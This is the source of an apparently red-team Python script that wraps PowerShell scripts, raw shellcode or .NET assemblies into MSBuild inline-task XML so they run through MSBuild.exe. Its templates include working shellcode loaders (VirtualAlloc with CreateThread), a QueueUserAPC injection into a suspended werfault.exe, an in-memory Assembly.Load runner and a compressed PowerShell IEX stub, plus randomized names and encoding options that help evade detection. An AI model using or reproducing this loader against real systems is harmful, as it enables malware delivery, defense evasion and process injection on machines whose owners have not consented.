mgeeky-Penetration-Testing-.../red-teaming/generateMSBuildXML.py

666 lines
24 KiB
Python

#!/usr/bin/python3
#
# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
#
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
# or
# %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
#
# This script can embed following data within constructed CSharp Task:
# - Powershell code
# - raw Shellcode in a separate thread via CreateThread
# - .NET Assembly via Assembly.Load
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
#
import re
import os
import io
import sys
import gzip
import base64
import string
import struct
import random
import binascii
import argparse
def getCompressedPayload(filePath, returnRaw = False):
out = io.BytesIO()
encoded = ''
with open(filePath, 'rb') as f:
inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp)
encoded = base64.b64encode(out.getvalue())
if returnRaw:
return encoded
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
encoded.decode()
)
return powershell
def getPayloadCode(payload):
return f'shellcode = "{payload}";'
payloadCode = '\n'
N = 50000
codeSlices = map(lambda i: payload[i:i+N], range(0, len(payload), N))
variables = []
num = 1
for code in codeSlices:
payloadCode += f'string shellcode{num} = "{code}";\n'
variables.append(f'shellcode{num}')
num += 1
concat = 'shellcode = ' + ' + '.join(variables) + ';\n'
payloadCode += concat
return payloadCode
def getInlineTask(module, payload, _format, apc, targetProcess):
templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
if len(module) > 0:
templateName = module
taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
payloadCode = getPayloadCode(payload.decode())
sys.stderr.write(payloadCode + '\n')
launchCode = ''
if _format == 'exe':
exeLaunchCode = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.IO;
using System.IO.Compression;
using System;
using System.Reflection;
using System.Text;
public class $templateName : Task {
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
gzip.CopyTo(decompressed);
return decompressed.ToArray();
}
}
}
}
public override bool Execute() {
string shellcode = "";
$payloadCode
byte[] payload = DecompressString(shellcode);
Assembly asm = Assembly.Load(payload);
MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null);
return true;
}
}
]]>
</Code>
</Task>''').safe_substitute(
payloadCode = payloadCode
)
launchCode = exeLaunchCode
elif _format == 'raw':
shellcodeLoader = ''
if not apc:
shellcodeLoader = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Text;
public class $templateName : Task {
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr hHandle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds );
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000;
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
gzip.CopyTo(decompressed);
return decompressed.ToArray();
}
}
}
}
public override bool Execute() {
string shellcode = "";
$payloadCode
byte[] payload = DecompressString(shellcode);
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(payload, 0, funcAddr, payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
CloseHandle(hThread);
VirtualFree(funcAddr, 0, MEM_RELEASE);
return true;
}
}
]]>
</Code>
</Task>''').safe_substitute(
templateName = templateName,
payloadCode = payloadCode
)
else:
#
# The below MSBuild template comes from:
# https://github.com/infosecn1nja/MaliciousMacroMSBuild
#
shellcodeLoader = string.Template('''<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Reflection;
using Microsoft.CSharp;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Text;
public class $templateName : Task, ITask
{
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
gzip.CopyTo(decompressed);
return decompressed.ToArray();
}
}
}
}
public override bool Execute() {
string shellcode = "";
$payloadCode
byte[] payload = DecompressString(shellcode);
string processpath = Environment.ExpandEnvironmentVariables(@"$targetProcess");
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
bool success = CreateProcess(null, processpath,
IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED,
IntPtr.Zero, null, ref si, out pi);
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, payload.Length,MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,payload,payload.Length, out bytesWritten);
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
uint oldProtect = 0;
resultBool = VirtualProtectEx(pi.hProcess,resultPtr, payload.Length,PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
ResumeThread(ThreadHandle);
return true;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
DuplicateHandle = 0x00000040,
CreateProcess = 0x000000080,
SetQuota = 0x00000100,
SetInformation = 0x00000200,
QueryInformation = 0x00000400,
QueryLimitedInformation = 0x00001000,
Synchronize = 0x00100000
}
[Flags]
public enum ProcessCreationFlags : uint
{
ZERO_FLAG = 0x00000000,
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NEW_CONSOLE = 0x00000010,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_NO_WINDOW = 0x08000000,
CREATE_PROTECTED_PROCESS = 0x00040000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_SEPARATE_WOW_VDM = 0x00001000,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_SUSPENDED = 0x00000004,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
DEBUG_PROCESS = 0x00000001,
DETACHED_PROCESS = 0x00000008,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
INHERIT_PARENT_AFFINITY = 0x00010000
}
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
public struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001) ,
SUSPEND_RESUME = (0x0002) ,
GET_CONTEXT = (0x0008) ,
SET_CONTEXT = (0x0010) ,
SET_INFORMATION = (0x0020) ,
QUERY_INFORMATION = (0x0040) ,
SET_THREAD_TOKEN = (0x0080) ,
IMPERSONATE = (0x0100) ,
DIRECT_IMPERSONATION = (0x0200)
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
int dwThreadId);
[DllImport("kernel32.dll",SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int nSize,
out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true )]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(
ProcessAccessFlags processAccess,
bool bInheritHandle,
int processId
);
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,
bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,
string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll")]
public static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll")]
public static extern uint SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
int dwSize, uint flNewProtect, out uint lpflOldProtect);
}
]]>
</Code>
</Task>''').safe_substitute(
templateName = templateName,
payloadCode = payloadCode,
targetProcess = targetProcess
)
launchCode = shellcodeLoader
else:
powershellLaunchCode = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.IO;
using System.IO.Compression;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Text;
public class $templateName : Task {
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
gzip.CopyTo(decompressed);
return decompressed.ToArray();
}
}
}
}
public override bool Execute() {
string shellcode = "";
$payloadCode
byte[] payload = DecompressString(shellcode);
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>''').safe_substitute(
templateName = templateName,
payloadCode = payloadCode
)
launchCode = powershellLaunchCode
template = string.Template('''<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName">
<$templateName />
</Target>
<UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
$launchCode
</UsingTask>
</Project>''').safe_substitute(
taskName = taskName,
templateName = templateName,
launchCode = launchCode
)
return template
def detectFileIsExe(filePath, forced = False):
first1000 = []
with open(filePath, 'rb') as f:
first1000 = f.read()[:1000]
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False
dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables:
# return False
return True
def minimize(output):
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
output = output.replace('\n', '')
output = re.sub(r'\s{2,}', ' ', output)
output = re.sub(r'\s+([^\w])\s+', r'\1', output)
output = re.sub(r'([^\w"])\s+', r'\1', output)
variables = {
'payload' : 'x',
'method' : 'm',
'asm' : 'a',
'instance' : 'o',
'pipeline' : 'p',
'runspace' : 'r',
'decoded' : 'd',
'MEM_COMMIT' : 'c1',
'PAGE_EXECUTE_READWRITE' : 'c2',
'MEM_RELEASE' : 'c3',
'funcAddr' : 'v1',
'hThread' : 'v2',
'threadId' : 'v3',
'lpAddress' : 'p1',
'dwSize' : 'p2',
'flAllocationType' : 'p3',
'flProtect' : 'p4',
'dwFreeType' : 'p5',
'lpThreadAttributes' : 'p6',
'dwStackSize' : 'p7',
'lpStartAddress' : 'p8',
'param' : 'p9',
'dwCreationFlags' : 'p10',
'lpThreadId' : 'p11',
'dwMilliseconds' : 'p12',
'hHandle' : 'p13',
'processpath' : 'p14',
'shellcode' : 'p15',
'resultPtr' : 'p16',
'bytesWritten' : 'p17',
'resultBool' : 'p18',
'ThreadHandle' : 'p19',
'PAGE_READWRITE' : 'p20',
'PAGE_EXECUTE_READ' : 'p21',
}
# Variables renaming tends to corrupt Base64 streams.
#for k, v in variables.items():
# output = output.replace(k, v)
return output
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
parser.add_argument('-o', '--output', metavar='PATH', default='', type=str, help = 'Output path where to write generated script. Default: stdout')
parser.add_argument('-n', '--module', metavar='NAME', default='', type=str, help = 'Specifies custom C# module name for the generated Task (for needs of shellcode loaders such as DotNetToJScript or Donut). Default: auto generated name.')
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
parser.add_argument('-e', '--exe', action='store_true',
help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread (VirtualAlloc + CreateThread)')
parser.add_argument('--queue-apc', action='store_true',
help = 'If --raw was specified, generate C# code template with CreateProcess + WriteProcessMemory + QueueUserAPC process injection technique instead of default CreateThread.')
parser.add_argument('--target-process', metavar='PATH', default=r'%windir%\system32\werfault.exe',
help = r'This option specifies target process path for remote process injection in --queue-apc technique. May use environment variables. May also contain command line for spawned process, example: --target-process "%%windir%%\system32\werfault.exe -l -u 1234"')
parser.add_argument('--only-csharp', action='store_true', help = 'Return generated C# code instead of MSBuild\'s XML.')
args = parser.parse_args()
if args.exe and args.raw:
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
sys.exit(-1)
args.target_process = args.target_process.replace("^%", '%')
return args
def main(argv):
sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:
print('Usage: ./generateMSBuildXML.py [options] <inputFile>')
sys.exit(-1)
args = opts(argv)
_format = 'powershell'
if args.exe:
if not detectFileIsExe(args.inputFile, args.exe):
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
return False
_format = 'exe'
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f:
payload = f.read()
elif args.raw:
_format = 'raw'
sys.stderr.write('[?] File specified as raw Shellcode.\n\n')
with open(args.inputFile, 'rb') as f:
payload = f.read()
else:
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
if args.inputFile.endswith('.exe'):
return False
payload = getCompressedPayload(args.inputFile, _format != 'powershell')
output = getInlineTask(args.module, payload, _format, args.queue_apc, args.target_process)
if args.only_csharp:
m = re.search(r'\<\!\[CDATA\[(.+)\]\]\>', output, re.M|re.S)
if m:
output = m.groups(0)[0]
if args.minimize:
output = minimize(output)
if args.encode:
if len(args.output) > 0:
with open(args.output, 'w') as f:
f.write(base64.b64encode(output))
else:
print(base64.b64encode(output))
else:
if len(args.output) > 0:
with open(args.output, 'w') as f:
f.write(output)
else:
print(output)
msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
if 'PROGRAMFILES(X86)' in os.environ:
msbuildPath = r'%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe'
sys.stderr.write('''
=====================================
Execute this XML file like so:
{} file.xml
'''.format(msbuildPath))
if __name__ == '__main__':
main(sys.argv)